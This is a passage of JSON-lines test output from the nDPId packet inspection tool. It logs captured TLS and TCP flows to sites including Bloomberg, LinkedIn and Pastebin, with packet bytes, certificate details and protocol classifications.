{"version":"TLSv1.3","client_requested_server_name":"kerve.last.fm","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482825245,"flow_last_seen":1646482825245,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482825245,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"69.191.252.15","src_port":39036,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1646482825245,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482825245,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8fBNAAEAGurHAqAGARb\/8D5h8AFDXP+M5AAAAAKAC+vDCpAAAAgQFtAQCCArIaWrDAAAAAAEDAwc="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1646482826257,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482826257,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8fBRAAEAGurDAqAGARb\/8D5h8AFDXP+M5AAAAAKAC+vC+sAAAAgQFtAQCCArIaW63AAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1646482828277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482828277,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8fBVAAEAGuq\/AqAGARb\/8D5h8AFDXP+M5AAAAAKAC+vC2zAAAAgQFtAQCCArIaXabAAAAAAEDAwc="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":394,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482844787,"flow_last_seen":1646482844787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482844787,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1646482844787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482844787,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8DedAAEAGEf7AqAGAl2XBSamUAbtMTKsLAAAAAKAC+vDPdgAAAgQFtAQCCApUsmtnAAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1646482844795,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482844795,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGJuWXZcFJwKgBgAG7qZRSHsTXTEyrDKAS\/\/9OHAAAAgQFTAQCCAoo5zzDVLJrZwEDAwk="} -01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1646482844798,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482844798,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5DelAAEAGD\/\/AqAGAl2XBSamUAbtMTKsMUh7E2IAYAfYA+gAAAQEIClSya3Io5zzDFgMBAgABAAH8AwORBDzSmJ5ztCo20SFZ11gW0AoQQ4sgaFZaA3Y+KP\/wXyDr7yv9lTOmWoS6i6wF3DRKGiQ0dwIiiuA6PbPxGRgIZwAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAWABQAABF3d3cuYmxvb21iZXJnLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACDquIWld0x6v\/7S4zdZ49LOkRXJqmmpTXYEodSal6cCHwAXAEEEAIPYMeBzwG1ajydlfuoJM30LuOrUqddbx+YHyLZsEMUExIIuEeju0UTUsS5CFNGsqSGbD968lENk0xLpNURtmQArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":396,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482844787,"flow_last_seen":1646482844798,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482844798,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00957{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":397,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482844787,"flow_last_seen":1646482844815,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1646482844815,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01825{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":399,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482844787,"flow_last_seen":1646482844815,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4537,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1646482844815,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.bloomberg.com","server_names":"www.bloomberg.com,api.businessweek.com,api.bwbx.io,assets.bwbx.io,byzantium.bloomberg.com,cdn-mobapi.bloomberg.com,cdn-videos.bloomberg.com,cdn.gotraffic.net,charts.bloomberg.com,embeds.bloomberg.com,fastly.bloomberg.tv,feeds.bloomberg.com,fonts.gotraffic.net,staging-assets.bwbx.io,nav.bloomberg.com,sponsored.bloomberg.com,spotlight.bloomberg.com,tictoc.video,www.bbthat.com,www.bloomberg.co.jp,www.bloomberg.co.jp.shared.bloomberga.com,www.bloomberg.com.shared.bloomberga.com,www.bloombergview.com,www.citylab.com,www.citylab.com.shared.bloomberga.com,www.quicktake.video,www.tictoc.video,cdn-api.cmobile.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=New York, L=New York, O=Bloomberg LP, CN=www.bloomberg.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"88:4A:85:34:1D:E6:C0:BE:5E:C6:14:BB:BA:94:A3:55:92:BA:95:82"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":403,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482845216,"flow_last_seen":1646482845216,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482845216,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.139.210.102","src_port":57014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1646482845216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482845216,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8ZOJAAEAG1L\/AqAGAbIvSZt62AbvYtDuvAAAAAKAC+vDuhAAAAgQFtAQCCAq3z7DKAAAAAAEDAwc="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1646482845236,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482845236,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8MSYAAPgGkHtsi9JmwKgBgAG73rYdOl\/82LQ7sKAS\/\/9A+gAAAgQFoAQCCAoefQzKt8+wygEDAwg="} -01166{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":405,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1646482845241,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482845241,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5ZORAAEAG0sDAqAGAbIvSZt62AbvYtDuwHTpf\/YAYAfbCEAAAAQEICrfPsOMefQzKFgMBAgABAAH8AwNDaq9+o2\/m1P9XaJsuL18rMu\/cbIc9LrPA5zUbsuvbziCdB7Y010YsAP9WvlmHthVAcmE9qTBtm04O9SpF9+K9iwAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAhAB8AABxzb3VyY2Vwb2ludGNtcC5ibG9vbWJlcmcuY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIFWzj0ex9WIWXeCl2qveVdo+cRB1gHroBn+mOFydyRUDABcAQQTZ7Kd3Dh15jhsRvRpWp2w5A6ZrOrpRgthYeTOHm9lBNbC7SyMy7sz4nAvG5eX8+75Yb0V9pFtY29+UzxdUbzEpACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAHoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482845216,"flow_last_seen":1646482845241,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482845241,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.139.210.102","src_port":57014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sourcepointcmp.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":406,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482845216,"flow_last_seen":1646482845260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646482845260,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.139.210.102","src_port":57014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sourcepointcmp.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":408,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482860064,"flow_last_seen":1646482860064,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482860064,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.14","src_port":48654,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1646482860064,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482860064,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8zthAAEAGckLAqAGADWsqDr4OAbv2xGogAAAAAKAC+vA6VgAAAgQFtAQCCArF2TKPAAAAAAEDAwc="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1646482860089,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646482860089,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0KdNAAHUG4k8NayoOwKgBgAG7vg7o0cSg9sRqIYAS\/\/+nUAAAAgQFoAEDAwgBAQQC"} -01150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":410,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1646482860092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646482860092,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItztpAAEAGcE\/AqAGADWsqDr4OAbv2xGoh6NHEoVAYAfY2twAAFgMBAgABAAH8AwN91wMalwKbnp34VhS8QvEFPozBOcSHhaFoSNBfPba3AiDXrrHLYmT\/nToyiJxYmouQzlobVBifJMUtdUWk4ZdOUAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAVABMAABB3d3cubGlua2VkaW4uY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIOvcUoPBHSJ9xxKLt05ZOdwqxB4X188WUTuTKbETRNVIABcAQQSw33BhIovc8GgXm9sGLVvnRexF7f826PClnfuvUvruR3Sq4irZ9toHOp2agzdKIN0AwGPF8iqx1fv+O3\/0IjBNACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":410,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482860064,"flow_last_seen":1646482860092,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482860092,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.14","src_port":48654,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LinkedIn","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.linkedin.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01720{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":414,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1646482860064,"flow_last_seen":1646482860115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4992,"flow_avg_l4_payload_len":713,"midstream":0,"thread_ts_msec":1646482860115,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.14","src_port":48654,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LinkedIn","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.linkedin.com","server_names":"www.linkedin.com,linkedin.com,rum5.perf.linkedin.com,exp4.www.linkedin.com,exp3.www.linkedin.com,exp2.www.linkedin.com,exp1.www.linkedin.com,rum2.perf.linkedin.com,rum4.perf.linkedin.com,rum6.perf.linkedin.com,rum17.perf.linkedin.com,rum8.perf.linkedin.com,rum9.perf.linkedin.com,afd.perf.linkedin.com,rum14.perf.linkedin.com,rum18.perf.linkedin.com,rum19.perf.linkedin.com,exp5.www.linkedin.com,realtime.www.linkedin.com,px.ads.linkedin.com,px4.ads.linkedin.com,dc.ads.linkedin.com,lnkd.in,px.jobs.linkedin.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"a66ea560599a2f5c89eec8c3a0d69cee","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=Sunnyvale, O=LinkedIn Corporation, CN=www.linkedin.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"CE:D8:A5:BE:BD:4B:EF:E9:22:C8:0D:55:A6:7A:A6:4A:B8:03:4A:53"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":417,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482866432,"flow_last_seen":1646482866432,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482866432,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.23.98.190","src_port":39934,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1646482866432,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482866432,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8sBtAAEAG\/aLAqAGAaBdivpv+AbuQtJSoAAAAAKAC+vAG0QAAAgQFtAQCCAoY1d1UAAAAAAEDAwc="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":418,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1646482866449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646482866449,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAADkGtMZoF2K+wKgBgAG7m\/4hqZihkLSUqYAS\/\/9k2gAAAgQFeAEBBAIBAwMK"} -01152{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1646482866451,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646482866451,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItsB1AAEAG+6\/AqAGAaBdivpv+AbuQtJSpIamYolAYAfYUJQAAFgMBAgABAAH8AwOkCw2THMGhALk0\/S0UPYY9Fiy1MMas0dLFjf2ObmEV3iD+CRapxYYnJ+AUET5SjxVSaJRJeT\/rvI5T4N1r2TpPLQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAARAA8AAAxwYXN0ZWJpbi5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAg+1dFx2JbQxGMLbjHxdWGfdupB63kQdiHTmuNhsrVgTQAFwBBBKdDPqMFSChZhRpkv1Y2JjoX2aNL5O59XM1C0oY6ZFf1Ifckam\/eVu5cuFoipFrAsWBrxGiWt6uHvmWbTHpfZoYAKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482866432,"flow_last_seen":1646482866451,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482866451,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.23.98.190","src_port":39934,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Pastebin","breed":"Potentially Dangerous","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pastebin.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01068{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":420,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482866432,"flow_last_seen":1646482866473,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1646482866473,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.23.98.190","src_port":39934,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Pastebin","breed":"Potentially Dangerous","category":"Download"},"tls": {"version":"TLSv1.3","client_requested_server_name":"pastebin.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 